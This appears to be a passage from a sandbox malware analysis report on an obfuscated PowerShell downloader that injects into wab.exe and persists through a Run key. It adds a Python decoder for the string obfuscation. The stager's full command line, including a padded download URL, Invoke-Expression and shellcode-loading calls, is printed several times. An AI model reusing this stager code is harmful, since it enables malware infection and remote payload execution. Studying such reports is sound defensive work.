            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000003.2367524519.0000000024862000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000003.2367524519.0000000024862000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000005.00000002.2257014116.0000000006DE8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match File source: 00000005.00000002.2265640290.000000000DB8A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2264331701.0000000008220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2253915133.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Trvaren)$global:Ubehjlpsommes = [System.Text.Encoding]::ASCII.GetString($Paddehatteskyernes)$global:Biologernes196=$Ubehjlpsommes.substring($Selvflelsers,$Topfigur)<#Redtab Trommesla
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Florideae $Locoweed $Playboyenes), (Latipennine @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:mukkerter = [AppDomain]::CurrentDomain.GetAssemblies()$glob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Adinida)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kurabel, $false).DefineType($Tekstforfatteres, $s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Trvaren)$global:Ubehjlpsommes = [System.Text.Encoding]::ASCII.GetString($Paddehatteskyernes)$global:Biologernes196=$Ubehjlpsommes.substring($Selvflelsers,$Topfigur)<#Redtab Trommesla
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.
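The obfuscation in the command line above is a single trick: every string literal passed to Oktantals is real text padded with four junk characters before each real one. Oktantals walks the literal from index 4 in steps of 5 and keeps one character per step ($Maaleresultatet.Substring($i, 1), called through the dynamically named method "SUBsTRing") while the index stays below Length - 1; the step length is $Afiklingshastighed, which starts unset and is incremented to 1 because ${host}.CurrentCulture is always set. Oncogenes then runs each decoded chunk through the command held in $eksileredes. The following decoder is an added example for this report, written in Python so nothing from the sample is executed; it is not code from Joe Sandbox or from the malware. The four literals in SAMPLE_CMDLINE are copied from the command line on this page; the function and constant names are this example's own.

```python
"""Decoder for the junk-padded string literals in the PowerShell stager above.

The stager's Oktantals($s) walks $s from index 4 in steps of 5 and keeps one
character per step ($s.Substring($i, 1)) while $i is below $s.Length - 1; the
other four characters of every group are filler. The per-step length comes
from $Afiklingshastighed, which starts unset ($null) and is bumped to 1 by the
"If (${host}.CurrentCulture)" line, a condition that is true in any normal host.

Added example for this report, not code from Joe Sandbox or from the sample.
The four literals in SAMPLE_CMDLINE are copied from the command line on this
page; the function names below are this example's own.
"""
from __future__ import annotations

import re

FIRST_INDEX = 4   # $Hypergamously starts at 4
STRIDE = 5        # $Hypergamously += 5
KEEP = 1          # $Afiklingshastighed after the ++ (Substring length)


def oktantals(padded: str) -> str:
    """Same result as the stager's Oktantals(): padded[4], padded[9], ...
    for every index below len(padded) - KEEP. That bound means a full final
    group never contributes, which is why each literal ends in filler."""
    limit = len(padded) - KEEP
    return "".join(padded[i:i + KEEP] for i in range(FIRST_INDEX, limit, STRIDE))


# Matches "$name = Oktantals '...'" and bare "Oktantals '...'" arguments.
# A PowerShell single-quoted literal cannot contain an unescaped quote, so the
# [^']* body is exact for these strings.
LITERAL_RE = re.compile(r"(?:\$(\w+)\s*=\s*)?Oktantals\s+'([^']*)'")


def decode_literals(cmdline: str) -> list[tuple[str, str]]:
    """Return (variable name or '', decoded text) for every Oktantals literal
    in a captured command line, in order of appearance."""
    return [(m.group(1) or "", oktantals(m.group(2)))
            for m in LITERAL_RE.finditer(cmdline)]


# Copied from the command line shown in this report. These four decode cleanly;
# others on the page (e.g. $Klagefrist, the User-Agent value) contain runs of
# spaces that the rendered page collapsed, so decode those from the raw
# captured command line rather than from the HTML text.
SAMPLE_CMDLINE = (
    "$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';"
    "$Dvelreres=Oktantals ' P o>wood ';"
    "$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';"
    "$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koa"
    "Op.rtRomaa Rim%Reex\\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttae"
    "VestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&"
    "Rutt MedbeFlotcProxhDowco.las Indst cr ';"
)

if __name__ == "__main__":
    for name, text in decode_literals(SAMPLE_CMDLINE):
        print(f"${name or '(argument)'} -> {text!r}")
```

On the sample, $Morvin decodes to User-Agent, $Dvelreres to ">", $eksileredes to iex (so Oncogenes is `& iex (<decoded chunk>)`, an Invoke-Expression of each decoded piece), and $Flagknap to `echo %appdata%\Nedprioriterende200.Sig && echo t`, which is exactly the cmd.exe child command line recorded in the process list of this report. The whitespace caveat matters in practice: HTML rendering collapses repeated spaces, so literals such as the Mozilla/5.0 User-Agent string in $Klagefrist come out garbled when decoded from the page text and must be taken from the raw captured command line.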
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_042529E3 push cs; ret 5_2_042529EA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_042534C7 push eax; retf 5_2_042534D1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0425B8E0 push eax; iretd 5_2_0425B8E1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0715100A push eax; mov dword ptr [esp], ecx 5_2_0715120C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07151200 push eax; mov dword ptr [esp], ecx 5_2_0715120C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C309C4 push es; ret 10_3_08C30A2E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C339CC push es; ret 10_3_08C33A36
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C3089F push cs; retf 10_3_08C308A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C338A7 push cs; retf 10_3_08C338A8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C365AB push cs; retf 10_3_08C365AC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C35CAD push cs; retf 10_3_08C35CAE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C30377 push cs; iretd 10_3_08C30378
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C3337F push cs; iretd 10_3_08C33380
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C31413 push es; retf 10_3_08C31414
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C3441B push es; retf 10_3_08C3441C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A11FEC push eax; iretd 10_2_24A11FED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A127FA pushad ; ret 10_2_24A127F9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A19939 push es; iretd 10_2_24A19940
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A1283D push eax; iretd 10_2_24A12858
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A1B008 push es; iretd 10_2_24A1B009
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A1225F pushad ; ret 10_2_24A127F9
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Scleroconjunctival
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 84A9764
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4898
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4983
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5605
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4171
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 605
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep count: 5605 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep count: 4171 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6572Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1888Thread sleep count: 605 > 30
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: powershell.exe, 00000002.00000002.2624656540.0000018D628E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll L
            Source: wab.exe, 0000000A.00000002.2408112651.0000000008BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C31AC6 LdrInitializeThunk,10_3_08C31AC6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara matchFile source: amsi64_6716.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6716, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6988, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3210000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2FDFA54
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
